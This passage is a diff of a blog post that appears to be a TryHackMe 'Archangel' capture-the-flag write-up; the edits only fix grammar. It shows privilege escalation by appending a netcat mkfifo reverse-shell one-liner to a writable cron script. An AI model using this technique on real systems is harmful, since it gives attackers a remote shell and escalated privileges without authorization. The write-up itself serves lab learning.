jsecurity-rocks/p4r490n.github.io/_posts/2021-06-06-TryHackMe - Archangel.md

 ENTER
 ```

-After this is done we have fully interactive tty :
+After this is done, we have a fully interactive tty :

 ![TTY](/img/posts/thm-archangel/tty_ok.png)

-In order to continue further - one of the first things to enumerate when trying to escalate privileges are cronjobs - scheduled tasks.
+To continue further - one of the first things to enumerate when trying to escalate privileges are cronjobs - scheduled tasks.
 I noticed this :

 ![Cronjob - Archangel](/img/posts/thm-archangel/crontab_user.png)

 We have write privileges on a cronjob of user Archangel which is executing every 1 minute.
-This is whats inside of the helloworld.sh :
+This is what's inside of the helloworld.sh :

 ```bash
 #!/bin/bash
 echo "hello world" >> /opt/backupfiles/helloworld.txt
 ```

-Lets set up a netcat listener and append a reverse shell to the *helloworld.sh* file :
+Let's set up a netcat listener and append a reverse shell to the *helloworld.sh* file :

 ```bash
 echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.9.83.183 80 >/tmp/f" >> /opt/helloworld.sh